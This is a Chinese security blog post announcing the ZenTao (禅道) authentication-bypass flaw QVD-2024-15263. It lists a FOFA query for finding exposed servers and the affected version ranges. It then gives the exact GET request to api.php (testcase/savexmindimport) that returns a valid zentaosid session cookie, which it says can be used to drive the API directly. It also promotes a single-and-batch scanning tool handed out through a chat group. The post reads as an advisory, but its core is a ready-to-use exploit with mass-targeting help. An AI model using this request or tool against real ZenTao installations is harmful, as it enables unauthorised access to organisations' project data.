ZenTao(禅道)身份认证绕过漏洞 QVD-2024-15263(附工具)

声明：由于传播、利用本公众号湘安无事所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，请勿利用文章内的相关技术或者工具从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。如有侵权烦请告知，我们会立即删除并致歉。谢谢！

-湘安无事漏洞安全通告-

禅道身份认证绕过漏洞的风险通告QVD-2024-15263 

01）漏洞名字

ZenTao（禅道）身份认证绕过漏洞 QVD-2024-15263

02）漏洞fofa语法

app="易软天创-禅道系统"body="禅道"

03）漏洞复现

1、F12打开浏览器控制台，点击Sources，展开js文件夹，js文件后存在禅道版本信息，查看版本是否符合要求

3.0  <= 禅道项目管理系统 <=4.11（旗舰版）16.0 <= 禅道项目管理系统 <=18.11（开源版）6.0  <= 禅道项目管理系统 <=8.11 （企业版）

2、发送以下请求

GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu

3、查看请求返回内容，如存在zentaosid，则认定存在漏洞，取出zentaosid备用,这里就相当于拿到cookies了，直接对着接口文档操作就行

https://www.zentao.net/book/zentaopmshelp/147.html

04）工具展示和获取

1、为了工具合法使用，新开了一个湘安无事内部工具微信群，再群里面获取下载网盘，如果有工具的bug也可以直接艾特深情哥提出问题，本文工具感谢团队学员kkbo8005开发。支持单个和批量扫描。

2、qq和微信群如下，网盘链接会发在公告里面，加不了的后台私信我

参考的文章

https://mp.weixin.qq.com/s/b7xmwiQ7PMU7wFOkmZ8WCw

原文始发于微信公众号（湘安无事）：ZenTao(禅道)身份认证绕过漏洞 QVD-2024-15263(附工具)